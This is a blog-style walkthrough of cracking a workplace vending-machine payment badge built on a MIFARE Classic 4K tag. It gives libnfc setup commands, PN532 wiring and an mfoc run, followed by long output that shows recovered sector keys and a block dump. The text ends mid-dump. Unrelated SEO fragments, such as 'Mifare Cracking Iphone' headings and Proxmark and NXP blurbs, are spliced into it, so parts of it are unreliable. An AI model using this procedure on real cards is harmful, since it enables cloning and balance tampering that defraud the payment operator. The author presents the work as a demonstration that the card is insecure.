1. Mifare Cracking Iphone
2. Mifare Cracking Code
3. Mifare Cracking Windows

1. Proxmark3 is a RFID Swiss Army Knife. It can also be used for cracking Mifare Classic keys. This doesn't use any of the instructions described here, instead see the proxmark3 wiki page for more information. The price quoted is for the bare board and HF antenna from Ryscc (US).
2. The evolution of Smart Cities is, in many ways, directly tied to the evolution of MIFARE ®, NXP‘s brand for contactless solutions. First deployed in 1994, MIFARE ICs were originally developed for automated fare collection in public transport, but that was just the beginning. Since then, MIFARE enables contactless transit, payment, and access experiences for citizens, independent of location.
3. The Proxmark is the tool behind all major RFID Security Research breakthroughs: Mifare Classic Crypto cracking, Mifare PRNG analysis, VingCard exploitation & defeat to name a few.
4. Cracking Mifare Ultralight Pro Nxp Mifare Ultralight The original Ultralight chip, which was the version identified by Benninger and Sobell as being used by the affected transit authorities, does not employ the cryptography that 'frequent-rider' plastic cards do.

At work there are some snack vending machines as well as coffee machines. They all work with the same payment system: either you add coins or you can recharge your account, getting identified thanks to your badge. It seemed pretty obvious to me that there were no server to manage your account so I wanted to know how my money was saved. The most obvious solution I thought about was that everything was saved on the card - and I was right!

So started my project to hack this card and determine either it was secure or not...

Please remember you are not allowed to add money you don't own to this kind of cards. This article is only about explaining how unsecure this payment method is. I am not responsible for the use you will make of the knowledge I provide.

Mifare Reader Attack: Sniffing, Cracking, Emulation, Open! LAB401 Academy - CHAMELEON MINI Tutorial. Posted by Sam Jenkins on Jul 16, 2020.

How the payment card works

First of all, I had to find what kind of NFC tag was used by the card. I used a free Android App for that: NFC Tools which is able to provide basic information on tags and more if they are not secured. The tag appeared to be a MIFARE 4K from the MIFARE Classic Family, these tags are pretty common for this kind of applications, which is quite sad regarding to what is written in the specs : 'The MIFARE 4K platform is a low-end memory technology and should be considered to provide only minimal security. As such only free-read data elements should be held on this platform.'.

You can read more about this lack of security in these articles:

http://www.sos.cs.ru.nl/applications/rfid/main.html
http://www.cs.ru.nl/~flaviog/publications/Attack.MIFARE.pdf
http://www.cs.ru.nl/~flaviog/publications/Pickpocketing.Mifare.pdf
http://www.cs.ru.nl/~flaviog/publications/Dismantling.Mifare.pdf

Since this is a project where the goal is to learn, I find it interesting to get to know how the MIFARE 4K tags work. I had done the research before finding an exploit and learned a lot of stuff that weren't needed to crack the tag but still, there's no useless knowledge!

A MIFARE 4K Classic memory embed 4096 bytes of EEPROM divided into 2 main areas:

• An area of 32 Sectors of 64 bytes (4 blocks) each (zone A)
• An area of 8 Sectors of 256 bytes (16 blocks) each (zone B)

Within zone A:

• 16 bytes are reserved for manufacturer data (this is called UID or Block 0)
• 512 bytes are reserved for keys and access control settings
• 1520 bytes are available for general storage of user data

Within zone B:

• 128 bytes are reserved for keys and access control settings
• 1920 bytes are available for general storage of user data

The sector trailer is the last block (block 3) in one sector. Each sector has a sector trailer. It contains information to handle the sector access conditions and the secret keys: A (mandatory) and B (optional). The access conditions for the blocks of that sector are stored in bytes 6...9. The access bits also specify the type (data or value) of the data blocks.

There is a lot more to learn in this document and many others you can find on the Web.

Finding an exploit

Due to the fact that the MIFARE 4K isn't a secure product, finding an exploit didn't take long. The challenge is to crack the keys to get read and write access to the tag. Fortunately - or unfortunately - the MIFARE tags security has been compromised in 2007 and 2008. First, Nohl and Plötz presented at Computing Community Consortium a partial reverse engineering Crypto-1 (the cryptography used by MIFARE Classic tags), putting forward some weaknesses. Then, in 2008, In March 2008 the Digital Security research group of the Radboud University Nijmegen made public that they performed a complete reverse-engineering and were able to clone and manipulate the contents of an OV-Chipkaart which is using MIFARE Classic chip. Since then, a lot of public exploits to crack MIFARE Classic tags have been developed. We are going to use one of them for this project.

Cracking the card

Mifare Cracking Iphone

To perform this attack, you will need a computer running Kali Linux, a PN532 NFC/RFID controller breakout board and a USB to TTL Serial Cable. You can use any other Linux distribution than Kali but I recommend it or any other Debian-based distribtion.

Before getting into the hardware part, we need to configure our operating system so we can read the output of our NFC reader.

root@kali: [~/mifare-hack] # apt-get install autoconf libtool libusb-dev libpcsclite-dev build-essential

root@kali: [~/mifare-hack] # wget https://github.com/nfc-tools/libnfc/releases/download/libnfc-1.7.1/libnfc-1.7.1.tar.bz2

root@kali: [~/mifare-hack] # tar -jxvf libnfc-1.7.1.tar.bz2

root@kali: [~/mifare-hack] # cd libnfc-1.7.1

root@kali: [~/mifare-hack/libnfc-1.7.1] # autoreconf -vis

root@kali: [~/mifare-hack/libnfc-1.7.1] # ./configure --with-drivers=all --sysconfdir=/etc --prefix=/usr

If you get this kind of error:

checking which drivers to build... acr122_usb

checking for documentation request... no

./configure: line 14026: syntax error near unexpected token `libusb,'

./configure: line 14026: ` PKG_CHECK_MODULES(libusb, libusb, HAVE_LIBUSB=1, HAVE_LIBUSB=0)'

then run

root@kali: [~/mifare-hack/libnfc-1.7.1] # apt-get install libglib2.0-dev

root@kali: [~/mifare-hack/libnfc-1.7.1] # autoreconf -vis

root@kali: [~/mifare-hack/libnfc-1.7.1] # ./configure

Finally, install libnfc:

root@kali: [~/mifare-hack/libnfc-1.7.1] # make

root@kali: [~/mifare-hack/libnfc-1.7.1] # make install

root@kali: [~/mifare-hack/libnfc-1.7.1] # mkdir -p /etc/nfc/devices.d

All right! Everything is configured, next we have to connect our NFC reader.

Connect you USB to TTL Cable and connect the black wire to GND, the red one to 5.0V, the green one to TXD and the white one to RXD. You might need to set SEL0 and SEL1 to OFF as shown in the picture.

One last configuration is now needed:

root@kali: [~/mifare-hack] # cp contrib/libnfc/pn532_via_uart2usb.conf.sample /etc/nfc/devices.d/pn532_via_uart2usb.conf

Next, let's check if we detect our NFC reader. Plug the USB to your PC then run

This should display a list of the NFC devices found by your computer.

Now that everything is configured, we can use one of the exploits available on Kali. The one we'll use here is mfoc. This CLI tool allows you to copy the content of a chip into a file. This command will notably be responsible for finding the different encryption keys that normally prevent reading the contents of the NFC tag. To use mfoc, put the MIFARE tag next to the reader and run

root@kali: [~/mifare-hack] # mfoc -O output.dmp

This will display what mfoc is doing and the tag's content as follow

Found Mifare Classic 4k tag

ISO/IEC 14443A (106 kbps) target:

ATQA (SENS_RES): 00 02

* UID size: single

* bit frame anticollision supported

UID (NFCID1): f2 8f a9 1f

SAK (SEL_RES): 18

* Not compliant with ISO/IEC 14443-4

* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:

* MIFARE Classic 4K

* MIFARE Plus (4 Byte UID or 4 Byte RID) 4K, Security level 1

* SmartMX with MIFARE 4K emulation

Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...

Symbols: '.' no key found, '/' A key found, ' B key found, 'x' both keys found

[Key: ffffffffffff] -> [.................xxxxxxxxxxxxxxxxxxxxxxx]

[Key: a0a1a2a3a4a5] -> [///xxxxxxxx//////xxxxxxxxxxxxxxxxxxxxxxx]

[Key: d3f7d3f7d3f7] -> [///xxxxxxxx//////xxxxxxxxxxxxxxxxxxxxxxx]

[Key: 000000000000] -> [///xxxxxxxx//////xxxxxxxxxxxxxxxxxxxxxxx]

[Key: b0b1b2b3b4b5] -> [///xxxxxxxx//////xxxxxxxxxxxxxxxxxxxxxxx]

[Key: 4d3a99c351dd] -> [///xxxxxxxx//////xxxxxxxxxxxxxxxxxxxxxxx]

[Key: 1a982c7e459a] -> [///xxxxxxxx//////xxxxxxxxxxxxxxxxxxxxxxx]

[Key: aabbccddeeff] -> [///xxxxxxxx//////xxxxxxxxxxxxxxxxxxxxxxx]

[Key: 714c5c886e97] -> [///xxxxxxxx//////xxxxxxxxxxxxxxxxxxxxxxx]

[Key: 587ee5f9350f] -> [///xxxxxxxx//////xxxxxxxxxxxxxxxxxxxxxxx]

[Key: a0478cc39091] -> [///xxxxxxxx//////xxxxxxxxxxxxxxxxxxxxxxx]

[Key: 533cb6c723f6] -> [///xxxxxxxx//////xxxxxxxxxxxxxxxxxxxxxxx]

[Key: 8fd0a4f256e9] -> [///xxxxxxxx//////xxxxxxxxxxxxxxxxxxxxxxx]

Sector 00 - FOUND_KEY [A] Sector 00 - UNKNOWN_KEY [B]

Sector 01 - FOUND_KEY [A] Sector 01 - UNKNOWN_KEY [B]

Sector 02 - FOUND_KEY [A] Sector 02 - UNKNOWN_KEY [B]

Sector 03 - FOUND_KEY [A] Sector 03 - FOUND_KEY [B]

Sector 04 - FOUND_KEY [A] Sector 04 - FOUND_KEY [B]

Sector 05 - FOUND_KEY [A] Sector 05 - FOUND_KEY [B]

Sector 06 - FOUND_KEY [A] Sector 06 - FOUND_KEY [B]

Sector 07 - FOUND_KEY [A] Sector 07 - FOUND_KEY [B]

Sector 08 - FOUND_KEY [A] Sector 08 - FOUND_KEY [B]

Sector 09 - FOUND_KEY [A] Sector 09 - FOUND_KEY [B]

Sector 10 - FOUND_KEY [A] Sector 10 - FOUND_KEY [B]

Sector 11 - FOUND_KEY [A] Sector 11 - UNKNOWN_KEY [B]

Sector 12 - FOUND_KEY [A] Sector 12 - UNKNOWN_KEY [B]

Sector 13 - FOUND_KEY [A] Sector 13 - UNKNOWN_KEY [B]

Sector 14 - FOUND_KEY [A] Sector 14 - UNKNOWN_KEY [B]

Sector 15 - FOUND_KEY [A] Sector 15 - UNKNOWN_KEY [B]

Sector 16 - FOUND_KEY [A] Sector 16 - UNKNOWN_KEY [B]

Sector 17 - FOUND_KEY [A] Sector 17 - FOUND_KEY [B]

Sector 18 - FOUND_KEY [A] Sector 18 - FOUND_KEY [B]

Sector 19 - FOUND_KEY [A] Sector 19 - FOUND_KEY [B]

Sector 20 - FOUND_KEY [A] Sector 20 - FOUND_KEY [B]

Sector 21 - FOUND_KEY [A] Sector 21 - FOUND_KEY [B]

Sector 22 - FOUND_KEY [A] Sector 22 - FOUND_KEY [B]

Sector 23 - FOUND_KEY [A] Sector 23 - FOUND_KEY [B]

Sector 24 - FOUND_KEY [A] Sector 24 - FOUND_KEY [B]

Sector 25 - FOUND_KEY [A] Sector 25 - FOUND_KEY [B]

Sector 26 - FOUND_KEY [A] Sector 26 - FOUND_KEY [B]

Sector 27 - FOUND_KEY [A] Sector 27 - FOUND_KEY [B]

Sector 28 - FOUND_KEY [A] Sector 28 - FOUND_KEY [B]

Sector 29 - FOUND_KEY [A] Sector 29 - FOUND_KEY [B]

Sector 30 - FOUND_KEY [A] Sector 30 - FOUND_KEY [B]

Sector 31 - FOUND_KEY [A] Sector 31 - FOUND_KEY [B]

Sector 32 - FOUND_KEY [A] Sector 32 - FOUND_KEY [B]

Sector 33 - FOUND_KEY [A] Sector 33 - FOUND_KEY [B]

Sector 34 - FOUND_KEY [A] Sector 34 - FOUND_KEY [B]

Sector 35 - FOUND_KEY [A] Sector 35 - FOUND_KEY [B]

Sector 36 - FOUND_KEY [A] Sector 36 - FOUND_KEY [B]

Sector 37 - FOUND_KEY [A] Sector 37 - FOUND_KEY [B]

Sector 38 - FOUND_KEY [A] Sector 38 - FOUND_KEY [B]

Sector 39 - FOUND_KEY [A] Sector 39 - FOUND_KEY [B]

Using sector 00 as an exploit sector

Sector: 0, type B, probe 0, distance 12267 .....

Sector: 0, type B, probe 1, distance 12219 .....

Found Key: B [4d4946415245]

Sector: 1, type B, probe 0, distance 12221 .....

Sector: 1, type B, probe 1, distance 12119 .....

Found Key: B [352c35263039]

Sector: 2, type B, probe 0, distance 12225 .....

Found Key: B [34333b1c2938]

Sector: 11, type B, probe 0, distance 12219 .....

Sector: 11, type B, probe 1, distance 12129 .....

Sector: 11, type B, probe 2, distance 12163 .....

Found Key: B [28e848826a1b]

Sector: 12, type B, probe 0, distance 12221 .....

Sector: 12, type B, probe 1, distance 12219 .....

Sector: 12, type B, probe 2, distance 12225 .....

Sector: 12, type B, probe 3, distance 12221 .....

Sector: 12, type B, probe 4, distance 12125 .....

Sector: 12, type B, probe 5, distance 12069 .....

Found Key: B [5095280084c1]

Sector: 13, type B, probe 0, distance 12225 .....

Sector: 13, type B, probe 1, distance 12173 .....

Found Key: B [644a52076b52]

Sector: 14, type B, probe 0, distance 12225 .....

Sector: 14, type B, probe 1, distance 12167 .....

Sector: 14, type B, probe 2, distance 12129 .....

Sector: 14, type B, probe 3, distance 12173 .....

Sector: 14, type B, probe 4, distance 12165 .....

Found Key: B [58df0c5997fc]

Sector: 15, type B, probe 0, distance 12271 .....

Sector: 15, type B, probe 1, distance 12125 .....

Sector: 15, type B, probe 2, distance 12117 .....

Sector: 15, type B, probe 3, distance 12129 .....

Sector: 15, type B, probe 4, distance 12169 .....

Sector: 15, type B, probe 5, distance 12117 .....

Sector: 15, type B, probe 6, distance 12165 .....

Sector: 15, type B, probe 7, distance 12175 .....

Sector: 15, type B, probe 8, distance 12131 .....

Sector: 15, type B, probe 9, distance 12175 .....

Found Key: B [281f343c0a2a]

Sector: 16, type B

Found Key: B [4d4946415245]

Auth with all sectors succeeded, dumping keys to a file!

Block 255, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 bc ff ff ff ff ff ff

Block 254, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 253, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 252, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 251, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 250, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 249, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 248, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 247, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 246, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 245, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 244, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 243, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 242, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 241, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 240, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 239, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 238, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 237, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 236, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 235, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 234, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 233, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 232, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 231, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 230, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 229, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 228, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 227, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 226, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 225, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 224, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 223, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 222, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 221, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 220, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 219, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 218, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 217, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 216, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 215, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 214, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 213, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 212, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 211, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 210, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 209, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 208, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 207, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 206, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 205, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 204, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 203, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 202, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 201, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 200, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 199, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 198, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 197, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 196, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 195, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 194, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 193, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 192, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 191, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 190, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 189, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 188, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 187, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 186, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 185, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 184, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 183, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 182, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 181, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 180, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 179, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 178, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 177, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 176, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 175, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 174, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 173, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 172, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 171, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 170, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 169, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 168, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 167, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 166, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 165, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 164, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 163, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 162, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 161, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 160, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 159, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 158, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 157, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 156, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 155, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 154, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 153, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 152, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 151, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 150, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 149, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 148, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 147, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 146, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 145, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 144, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 143, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 142, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 141, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 140, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 139, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 138, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 137, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 136, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 135, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 134, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 133, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 132, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 131, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 130, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 129, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 128, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 127, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 126, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 125, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 124, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 123, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 122, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 121, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 120, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 119, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 118, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 117, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 116, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 115, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 114, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 113, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 112, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 111, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 110, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 109, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Mifare Cracking Code

Block 108, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 107, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 106, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 105, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 104, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 103, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 102, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 101, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 100, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 99, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 98, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 97, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 96, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 95, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 94, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 93, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 92, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 91, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 90, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 89, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 88, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 87, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

Block 86, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 85, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 84, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Block 83, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff

